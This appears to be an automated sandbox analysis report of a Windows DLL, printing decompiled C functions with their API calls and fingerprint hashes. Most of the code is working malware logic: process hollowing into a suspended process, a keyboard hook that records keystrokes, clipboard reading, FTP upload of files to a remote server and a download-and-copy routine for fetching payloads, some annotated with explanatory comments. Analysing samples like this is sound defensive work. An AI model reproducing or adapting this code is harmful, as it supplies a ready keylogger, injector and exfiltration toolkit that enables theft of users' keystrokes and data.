                  				long _v24;
                  				intOrPtr _v28;
                  				void* _v88;
                  				long _v252;
                  				long _v256;
                  				void* _v284;
                  				intOrPtr _v296;
                  				signed short _v330;
                  				void* _v336;
                  				intOrPtr _v356;
                  				long _v360;
                  				intOrPtr _v364;
                  				long _v368;
                  				void* _v376;
                  				struct _PROCESS_INFORMATION _v392;
                  				struct _CONTEXT _v664;
                  				void* _t152;
                  				void* _t155;
                  				intOrPtr _t173;
                  				intOrPtr _t174;
                  				intOrPtr _t175;
                  				void* _t182;
                  				void* _t184;
                  				void* _t185;
                  				void* _t187;
                  				void* _t189;
                  				intOrPtr _t190;
                  				void* _t191;
                  
                  				_t187 = _t189;
                  				_t190 = _t189 + 0xfffffd6c;
                  				_v12 = __edx;
                  				_v8 = __eax;
                  				E100045F4(_v8);
                  				E10003C28( &_v12);
                  				_push(_t187);
                  				_push(0x1000c027);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t190;
                  				_push(_t187);
                  				_push(0x1000bfdf);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t190;
                  				E100026E0( &(_v664.ExtendedRegisters), 0x44);
                  				_t191 = _t187;
                  				E100026E0( &_v392, 0x10);
                  				E100026E0( &_v664, 0xcc);
                  				_v664.ExtendedRegisters.cb = 0x44;
                  				_v664.ContextFlags = 0x10007;
                  				_t184 = _v8;
                  				E1000BD50();
                  				E1000BD50();
                  				if(CreateProcessW(0, E1000390C(_v12), 0, 0, 0, 4, 0, 0,  &(_v664.ExtendedRegisters),  &_v392) != 0) {
                  					Sleep(0xc8);
                  					GetThreadContext(_v392.hThread,  &_v664);
                  					ReadProcessMemory(_v392.hProcess, _v664.Ebx + 8,  &_v24, 4,  &_v20);
                  					NtUnmapViewOfSection(_v392.hProcess,  &_v24);
                  					_v16 = VirtualAllocEx(_v392.hProcess, _v284, _v256, 0x3000, 4);
                  					WriteProcessMemory(_v392.hProcess, _v16, _t184, _v252,  &_v20);
                  					_t182 = _v28 + 0xf8;
                  					_t152 = (_v330 & 0x0000ffff) - 1;
                  					if(_t152 >= 0) {
                  						_t155 = _t152 + 1;
                  						_t185 = 0;
                  						do {
                  							_push(0);
                  							_push(_t182);
                  							asm("cdq");
                  							asm("adc edx, [esp+0x4]");
                  							_t191 = _t191 + 8;
                  							E1000BD50();
                  							WriteProcessMemory(_v392.hProcess, _v16 + _v364, _v8 + _v356, _v360,  &_v20);
                  							VirtualProtectEx(_v392.hProcess, _v16 + _v364, _v368, 0x40,  &_v24);
                  							_t185 = _t185 + 1;
                  							_t155 = _t155 - 1;
                  						} while (_t155 != 0);
                  					}
                  					WriteProcessMemory(_v392, _v664.Ebx + 8,  &_v16, 4,  &_v20);
                  					asm("sbb ebx, ebx");
                  					_v664.Eax = _v16 + _v296;
                  					if(_t152 + 1 == 1) {
                  						SetThreadContext(_v392.hThread,  &_v664);
                  						asm("sbb ebx, ebx");
                  						ResumeThread(_v392.hThread);
                  					}
                  				}
                  				_pop(_t173);
                  				 *[fs:eax] = _t173;
                  				_pop(_t174);
                  				 *[fs:eax] = _t174;
                  				_push(E1000C02E);
                  				E10003770( &_v12);
                  				_t175 =  *E1000BD14; // 0x1000bd18
                  				return E10004590( &_v8, _t175);
                  			}

                  APIs
                    • Part of subcall function 10003C28: SysAllocStringLen.OLEAUT32(CONFIG,?), ref: 10003C36
                  • CreateProcessW.KERNEL32 ref: 1000BE3A
                  • Sleep.KERNEL32(000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 1000BE4C
                  • GetThreadContext.KERNEL32(?,00010007,000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 1000BE5F
                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00010007,000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 1000BE7F
                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 1000BE8F
                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,00000000,?,00010007,000000C8,00000000,00000000,00000000), ref: 1000BEB0
                  • WriteProcessMemory.KERNEL32(?,00000000,1000C797,?,00000000,?,?,?,00003000,00000004,?,?,?,00000004,00000000,?), ref: 1000BECF
                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 1000BF46
                  • VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?,?,?), ref: 1000BF69
                  • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?,00003000,00000004,?), ref: 1000BF91
                  • SetThreadContext.KERNEL32(?,00010007,?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?,00003000), ref: 1000BFBE
                  • ResumeThread.KERNEL32(?,?,00010007,?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?), ref: 1000BFD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$CreateProtectReadResumeSectionSleepStringUnmapView
                  • String ID: D
                  • API String ID: 3069046386-2746444292
                  • Opcode ID: 5631d4e2f2f3d5cc413d0a5eaa7ab72704478a6d10640b3fbfc5c98150998316
                  • Instruction ID: 773f2633af5c966dbae7503bb26a44348cd9fcb95ad73bfc51fdb85d8e92df93
                  • Opcode Fuzzy Hash: 5631d4e2f2f3d5cc413d0a5eaa7ab72704478a6d10640b3fbfc5c98150998316
                  • Instruction Fuzzy Hash: A971DAB5A00119AFEB60DB98CD81FEEB3FCEB48340F5144A5F608E7245DA74AE458F64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E10004B4D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                  				long _t11;
                  				void* _t16;
                  
                  				_t16 = __ebx;
                  				 *__edi =  *__edi + __ecx;
                  				 *((intOrPtr*)(__eax - 0x1000f5a8)) =  *((intOrPtr*)(__eax - 0x1000f5a8)) + __eax - 0x1000f5a8;
                  				 *0x1000e008 = 2;
                  				 *0x1000f010 = 0x10001098;
                  				 *0x1000f014 = 0x100010a0;
                  				 *0x1000f03a = 2;
                  				 *0x1000f000 = E10003FA8;
                  				if(E100027DC() != 0) {
                  					_t3 = E1000280C();
                  				}
                  				E100028D0(_t3);
                  				 *0x1000f040 = 0xd7b0;
                  				 *0x1000f20c = 0xd7b0;
                  				 *0x1000f3d8 = 0xd7b0;
                  				 *0x1000f030 = GetCommandLineA();
                  				 *0x1000f02c = E10001150();
                  				if((GetVersion() & 0x80000000) == 0x80000000) {
                  					 *0x1000f5ac = E10004A84(GetThreadLocale(), _t16, __eflags);
                  				} else {
                  					if((GetVersion() & 0x000000ff) <= 4) {
                  						 *0x1000f5ac = E10004A84(GetThreadLocale(), _t16, __eflags);
                  					} else {
                  						 *0x1000f5ac = 3;
                  					}
                  				}
                  				_t11 = GetCurrentThreadId();
                  				 *0x1000f024 = _t11;
                  				return _t11;
                  			}

                  APIs
                    • Part of subcall function 100027DC: GetKeyboardType.USER32 ref: 100027E1
                    • Part of subcall function 100027DC: GetKeyboardType.USER32 ref: 100027ED
                  • GetCommandLineA.KERNEL32 ref: 10004BB3
                  • GetVersion.KERNEL32 ref: 10004BC7
                  • GetVersion.KERNEL32 ref: 10004BD8
                  • GetCurrentThreadId.KERNEL32 ref: 10004C14
                    • Part of subcall function 1000280C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 1000282E
                    • Part of subcall function 1000280C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,1000287D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 10002861
                    • Part of subcall function 1000280C: RegCloseKey.ADVAPI32(?,10002884,00000000,?,00000004,00000000,1000287D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 10002877
                  • GetThreadLocale.KERNEL32 ref: 10004BF4
                    • Part of subcall function 10004A84: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,10004AEA), ref: 10004AAA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                  • String ID: p3v
                  • API String ID: 3734044017-3871146107
                  • Opcode ID: 4b223a8082610888e86e6a9728138b880df6553b396fe473043678283972453b
                  • Instruction ID: b691414424a171523e6ed701ccaa2f926f8cba09af9fdddc6886d40973360df8
                  • Opcode Fuzzy Hash: 4b223a8082610888e86e6a9728138b880df6553b396fe473043678283972453b
                  • Instruction Fuzzy Hash: 600156F88013918AF750EFB08C863A93B60EB113C0F01852DD2404AA6FDFB95184EB6B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E10006D04() {
                  				void* _t10;
                  
                  				_t10 = 1;
                  				if(GetKeyState(0x14) != 1 || GetKeyState(0x10) >= 0) {
                  					if(GetKeyState(0x14) != 1 || GetKeyState(0x10) < 0) {
                  						if(GetKeyState(0x14) == 1 || GetKeyState(0x10) >= 0) {
                  							if(GetKeyState(0x14) != 1 && GetKeyState(0x10) >= 0) {
                  								_t10 = 1;
                  							}
                  						} else {
                  							_t10 = 0;
                  						}
                  					} else {
                  						_t10 = 0;
                  					}
                  				} else {
                  					_t10 = 1;
                  				}
                  				return _t10;
                  			}

                  APIs
                  • GetKeyState.USER32(00000014), ref: 10006D09
                  • GetKeyState.USER32(00000010), ref: 10006D16
                  • GetKeyState.USER32(00000014), ref: 10006D26
                  • GetKeyState.USER32(00000010), ref: 10006D33
                  • GetKeyState.USER32(00000014), ref: 10006D43
                  • GetKeyState.USER32(00000010), ref: 10006D50
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: State
                  • String ID:
                  • API String ID: 1649606143-0
                  • Opcode ID: 6918d53d3d07aab4c0cd6e783a8e12689080c07576cae801b53ea161e8d972bc
                  • Instruction ID: d6486f2fec8aba8f3b5500d340924e9af812674e08ffb561a2d1824f8f856f0b
                  • Opcode Fuzzy Hash: 6918d53d3d07aab4c0cd6e783a8e12689080c07576cae801b53ea161e8d972bc
                  • Instruction Fuzzy Hash: 6EF01D2CF95A4728FD90E2A04D527DD1152CF187C6FA0802AEA802D09E98825AC630FB
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E10008040(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
                  				intOrPtr _v20;
                  				char _v24;
                  				struct HKL__* _v28;
                  				char _v284;
                  				intOrPtr _v288;
                  				char _v292;
                  				struct HHOOK__* _t20;
                  				int _t32;
                  				intOrPtr _t33;
                  				long _t38;
                  				void* _t48;
                  
                  				_push(_t48);
                  				_push(0x10008123);
                  				_push( *[fs:edx]);
                  				 *[fs:edx] = _t48 + 0xfffffee0;
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				if(_a4 == 0 && (_a8 == 0x104 || _a8 == 0x100)) {
                  					GetKeyboardState( &_v284);
                  					_v28 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), 0));
                  					_v292 = _v24;
                  					_v288 = _v20;
                  					_t38 = VirtualAlloc(0, 0x10c, 0x1000, 0x40);
                  					E100050D0(_t38,  &_v292);
                  					_t32 =  *0x1000f68c; // 0xc1b9
                  					_t33 =  *0x1000f688; // 0x0
                  					SendMessageA(E1000662C(_t33), _t32, 0x10c, _t38);
                  				}
                  				_pop( *[fs:0x0]);
                  				_push(E1000812A);
                  				_t20 =  *0x1000f6d4; // 0x0
                  				return CallNextHookEx(_t20, _a4, _a8, _a12);
                  			}

                  APIs
                  • GetKeyboardState.USER32(?,00000000,10008123), ref: 1000808A
                  • GetForegroundWindow.USER32(?,00000000,10008123), ref: 1000808F
                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 10008097
                  • GetKeyboardLayout.USER32 ref: 1000809F
                  • VirtualAlloc.KERNEL32(00000000,0000010C,00001000,00000040,00000000,?,00000000,10008123), ref: 100080C7
                  • SendMessageA.USER32(00000000,0000C1B9,0000010C,00000000), ref: 100080F7
                  • CallNextHookEx.USER32(00000000,?,?,?), ref: 1000811D
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: KeyboardWindow$AllocCallForegroundHookLayoutMessageNextProcessSendStateThreadVirtual
                  • String ID:
                  • API String ID: 2475829859-0
                  • Opcode ID: cfb8c2f6c07dd6c8c12c5b73d6607ef2dbe25eb77fb659a241c05aedeeedaf23
                  • Instruction ID: 27a6fad57be863aabbe855ec58336ce39a4f816ab1f20d22dae40b31cdfd5c32
                  • Opcode Fuzzy Hash: cfb8c2f6c07dd6c8c12c5b73d6607ef2dbe25eb77fb659a241c05aedeeedaf23
                  • Instruction Fuzzy Hash: 412151B4600208AFFB51DF64CC82FDB37A8EB4C781F004524FA44A7255DA75AE858FA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100068EC(WCHAR* __eax, WCHAR* __ecx, WCHAR* __edx, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12) {
                  				WCHAR* _v8;
                  				WCHAR* _v12;
                  				int _t14;
                  				WCHAR* _t25;
                  				void* _t33;
                  				void* _t36;
                  
                  				_v12 = __ecx;
                  				_v8 = __edx;
                  				_t25 = __eax;
                  				_t36 = InternetOpenW(0, 1, 0, 0, 0);
                  				_t33 = InternetConnectW(_t36, _t25, 0x15, _a8, _a4, 1, 0x8000000, 0);
                  				_t14 = FtpSetCurrentDirectoryW(_t33, _v8);
                  				asm("sbb eax, eax");
                  				WaitForSingleObject(_t14 + 0x00000001 & 0x0000007f, 0xffffffff);
                  				FtpPutFileW(_t33, _v12, _a12, 2, 0);
                  				asm("sbb ebx, ebx");
                  				InternetCloseHandle(_t36);
                  				InternetCloseHandle(_t33);
                  				return  &(_t25[0]);
                  			}

                  APIs
                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 10006907
                  • InternetConnectW.WININET(00000000,?,00000015,?,?,00000001,08000000,00000000), ref: 10006923
                  • FtpSetCurrentDirectoryW.WININET(00000000,?), ref: 1000692F
                  • WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 10006940
                  • FtpPutFileW.WININET(00000000,?,?,00000002,00000000), ref: 10006952
                  • InternetCloseHandle.WININET(00000000), ref: 1000695E
                  • InternetCloseHandle.WININET(00000000), ref: 10006964
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandle$ConnectCurrentDirectoryFileObjectOpenSingleWait
                  • String ID:
                  • API String ID: 140008950-0
                  • Opcode ID: 986aac2d3270ff8f09d33a4b0a939757c489752215f58343083dd92cbf4cca8d
                  • Instruction ID: cbc3213e50a342726adeb0dcb95658ed0f55962254ebdcc4bae47dda2437ff56
                  • Opcode Fuzzy Hash: 986aac2d3270ff8f09d33a4b0a939757c489752215f58343083dd92cbf4cca8d
                  • Instruction Fuzzy Hash: D80175767853047EF710DAA84C83FBE629CDB49BA5F300629F614EB1C1D5B27D004665
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 59%
                  			E100069DC(struct HWND__* __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
                  				char _v8;
                  				char _v9;
                  				void* _v16;
                  				intOrPtr _v24;
                  				long _v28;
                  				intOrPtr* _t49;
                  				intOrPtr _t62;
                  				intOrPtr _t63;
                  				intOrPtr _t64;
                  				intOrPtr _t70;
                  				struct HWND__* _t72;
                  				void* _t75;
                  				void* _t76;
                  				intOrPtr _t77;
                  
                  				_t75 = _t76;
                  				_t77 = _t76 + 0xffffffe8;
                  				_v8 = 0;
                  				_t49 = __edx;
                  				_t72 = __eax;
                  				_push(_t75);
                  				_push(0x10006b04);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t77;
                  				_v9 = 1;
                  				E10003770(__edx);
                  				if(OpenClipboard(_t72) == 0) {
                  					_v9 = 0;
                  					__eflags = 0;
                  					_pop(_t62);
                  					 *[fs:eax] = _t62;
                  					_push(E10006B0B);
                  					_t63 =  *0x100069b4; // 0x100069b8
                  					return E10004590( &_v8, _t63);
                  				} else {
                  					_push(_t75);
                  					_push(0x10006add);
                  					_push( *[fs:eax]);
                  					 *[fs:eax] = _t77;
                  					_v16 = GetClipboardData(0xd);
                  					_t80 = _v16;
                  					if(_v16 == 0) {
                  						_v9 = 0;
                  						__eflags = 0;
                  						_pop(_t64);
                  						 *[fs:eax] = _t64;
                  						_push(E10006AE8);
                  						return CloseClipboard();
                  					} else {
                  						_push(_t75);
                  						_push(0x10006abf);
                  						_push( *[fs:eax]);
                  						 *[fs:eax] = _t77;
                  						_t31 = _v16;
                  						GlobalFix(_v16);
                  						_v28 = GlobalSize(_v16);
                  						_v24 = 0;
                  						_push(_v28);
                  						E10004584();
                  						E100050D0(_v8, _t31);
                  						E100037AC(_t49, _v8);
                  						E10003AB8( *_t49, E1000391C( *_t49) - 1, 1, _t80, _t49);
                  						_pop(_t70);
                  						 *[fs:eax] = _t70;
                  						_push(E10006ACA);
                  						return GlobalUnWire(_v16);
                  					}
                  				}
                  			}

                  APIs
                    • Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E
                  • OpenClipboard.USER32(00000000), ref: 10006A07
                  • GetClipboardData.USER32 ref: 10006A24
                  • GlobalFix.KERNEL32(00000000), ref: 10006A48
                  • GlobalSize.KERNEL32(00000000), ref: 10006A53
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • GlobalUnWire.KERNEL32(00000000), ref: 10006AB9
                  • CloseClipboard.USER32 ref: 10006AD7
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: ClipboardGlobal$String$AllocCloseDataFreeOpenSizeWire
                  • String ID:
                  • API String ID: 1300121464-0
                  • Opcode ID: 064efa2ddcbdc333166debe158bc30ea9b511c389f605a726f971f8daa8baf48
                  • Instruction ID: 6c9ee2d81449cc0851c779360ccc62e81b10a1ab3d70038b93f0ad500b4e2f45
                  • Opcode Fuzzy Hash: 064efa2ddcbdc333166debe158bc30ea9b511c389f605a726f971f8daa8baf48
                  • Instruction Fuzzy Hash: D3310774A04644AFFB01DBA4CC52AAFB7E9EB4D380F6284B5F900E3749DB35AD00CA55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E100051E8(WCHAR* __eax, void* __edx) {
                  				WCHAR* _t2;
                  				struct HINSTANCE__* _t3;
                  				struct HINSTANCE__* _t5;
                  				struct HINSTANCE__* _t7;
                  				void* _t9;
                  				struct HRSRC__* _t13;
                  				void* _t14;
                  				void* _t19;
                  
                  				_t2 = __eax;                           // resource name (or MAKEINTRESOURCE id) to load
                  				_t19 = __edx;                          // destination string, filled below
                  				if(__eax == 0) {
                  					_t2 =  *0x1000e0a8; // 0x100051d8    default resource name used when none is passed
                  				}
                  				_t3 =  *0x1000f654; // 0x10000000    module base of this DLL (HInstance)
                  				_t13 = FindResourceW(_t3, _t2, 0xa);   // type 0xa = RT_RCDATA: raw embedded data
                  				_t5 =  *0x1000f654; // 0x10000000
                  				SizeofResource(_t5, _t13);             // return value is discarded
                  				_t7 =  *0x1000f654; // 0x10000000
                  				_t14 = LoadResource(_t7, _t13);
                  				_t9 = LockResource(_t14);
                  				if(_t9 != 0) {
                  					E100050D0(_t19, _t9);                // copy the resource bytes into the caller's string
                  					return FreeResource(_t14);
                  				}
                  				return _t9;
                  			}

                  Instruction addresses (one per decompiled statement, in source order):
                  0x100051e8 0x100051eb 0x100051ef 0x100051f1 0x100051f1 0x100051f9 0x10005204 0x10005207 0x1000520d
                  0x10005215 0x10005220 0x10005223 0x1000522a 0x10005231 0x00000000 0x10005237 0x1000523f

                  APIs
                  • FindResourceW.KERNEL32(10000000,00000000,0000000A,1000F834,?,?,1000D1D5,00008007,00000000,1000D759,?,?,?,?,00000000,00000000), ref: 100051FF
                  • SizeofResource.KERNEL32(10000000,00000000,10000000,00000000,0000000A,1000F834,?,?,1000D1D5,00008007,00000000,1000D759), ref: 1000520D
                  • LoadResource.KERNEL32(10000000,00000000,10000000,00000000,10000000,00000000,0000000A,1000F834,?,?,1000D1D5,00008007,00000000,1000D759), ref: 1000521B
                  • LockResource.KERNEL32(00000000,10000000,00000000,10000000,00000000,10000000,00000000,0000000A,1000F834,?,?,1000D1D5,00008007,00000000,1000D759), ref: 10005223
                  • FreeResource.KERNEL32(00000000,00000000,10000000,00000000,10000000,00000000,10000000,00000000,0000000A,1000F834,?,?,1000D1D5,00008007,00000000,1000D759), ref: 10005237
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Resource$FindFreeLoadLockSizeof
                  • String ID:
                  • API String ID: 4159136517-0
                  • Opcode ID: 6f9064c725ce0eda676baacf6c63ec492ac870baedeada23c600b6ea1a41f5ea
                  • Instruction ID: 394ad428024afc6b979a81fc6034fab6802de57518f58b4d3ea2d93c6a88d4c5
                  • Opcode Fuzzy Hash: 6f9064c725ce0eda676baacf6c63ec492ac870baedeada23c600b6ea1a41f5ea
                  • Instruction Fuzzy Hash: 98F08CF63006512BF600D3F98CC1E3B62DDFB986C1B020024B608D721ADD29EC044364
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 34%
                  			E10005F86(char __eax, void* __ebx, char __edx) {
                  				char _v8;        // URL (WideString passed in eax)
                  				char _v12;       // destination path (WideString passed in edx)
                  				short _v534;     // WCHAR[MAX_PATH] buffer that receives the cache file name
                  				void* _t18;
                  				intOrPtr _t32;
                  				void* _t36;
                  
                  				_v12 = __edx;
                  				_v8 = __eax;
                  				E10003C28( &_v8);                      // retain the two string arguments (subcall ends in SysAllocStringLen)
                  				E10003C28( &_v12);
                  				_push(_t36);
                  				_push(0x10006016);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t36 + 0xfffffdec;        // install try/finally SEH frame
                  				_push(0);                              // pBSC = NULL (arguments pushed right to left)
                  				_push(0x10);                           // dwReserved
                  				_push(0x104);                          // cchFileName = MAX_PATH
                  				_push( &_v534);                        // szFileName: receives the path of the cached download
                  				_t18 = E1000390C(_v8);                 // PWideChar(url)
                  				_push(_t18);                           // szURL
                  				_push(0);                              // lpUnkcaller = NULL
                  				L10005F80();                           // URLDownloadToCacheFileW (urlmon), see APIs: ref 10005FD1
                  				if(_t18 == 0) {                        // HRESULT == S_OK (the decompiler reuses _t18 for the eax return value)
                  					CopyFileW( &_v534, E1000390C(_v12), 0);   // copy the cached file to the destination; bFailIfExists = FALSE overwrites
                  					asm("sbb ebx, ebx");                      // part of the LongBool -> Boolean conversion of CopyFileW's result
                  				}
                  				_pop(_t32);
                  				 *[fs:eax] = _t32;                     // restore SEH frame
                  				_push(E1000601D);
                  				return E10003788( &_v12, 2);           // release both string arguments (subcall ends in SysFreeString)
                  			}

                  Instruction addresses (one per decompiled statement, in source order):
                  0x10005f92 0x10005f95 0x10005f9b 0x10005fa3 0x10005faa 0x10005fab 0x10005fb0 0x10005fb3 0x10005fb6
                  0x10005fb8 0x10005fba 0x10005fc5 0x10005fc9 0x10005fce 0x10005fcf 0x10005fd1 0x10005fd8 0x10005fec
                  0x10005ff4 0x10005ff6 0x10005ffd 0x10006000 0x10006003 0x10006015

                  APIs
                    • Part of subcall function 10003C28: SysAllocStringLen.OLEAUT32(CONFIG,?), ref: 10003C36
                  • URLDownloadToCacheFileW.URLMON(00000000,00000000,?,00000104,00000010,00000000), ref: 10005FD1
                  • CopyFileW.KERNEL32(?,00000000,00000000,00000000,10006016), ref: 10005FEC
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$AllocCacheCopyDownloadString
                  • String ID:
                  • API String ID: 2397740412-0
                  • Opcode ID: 4a77a2e6e5b60fd12bd9e17b935437ef89a8161801deff5e08ca33a82e0ce24b
                  • Instruction ID: 518c37ad459ba6dfeec1cc82918b9415ec9692cdfa9117b24deab1163ccdcd4a
                  • Opcode Fuzzy Hash: 4a77a2e6e5b60fd12bd9e17b935437ef89a8161801deff5e08ca33a82e0ce24b
                  • Instruction Fuzzy Hash: 4D018474544208BEF711DB64CC82FEFBBECDB08780F904572F504E6196EB75AA549A50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLocalTime.KERNEL32(?,00000000,10006CD2,?,?,?,?,00000000,00000000,0000003A,?,1000C3BA,?,.dat,?,1000C958), ref: 10006B42
                    • Part of subcall function 10003788: SysFreeString.OLEAUT32(?), ref: 1000379B
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
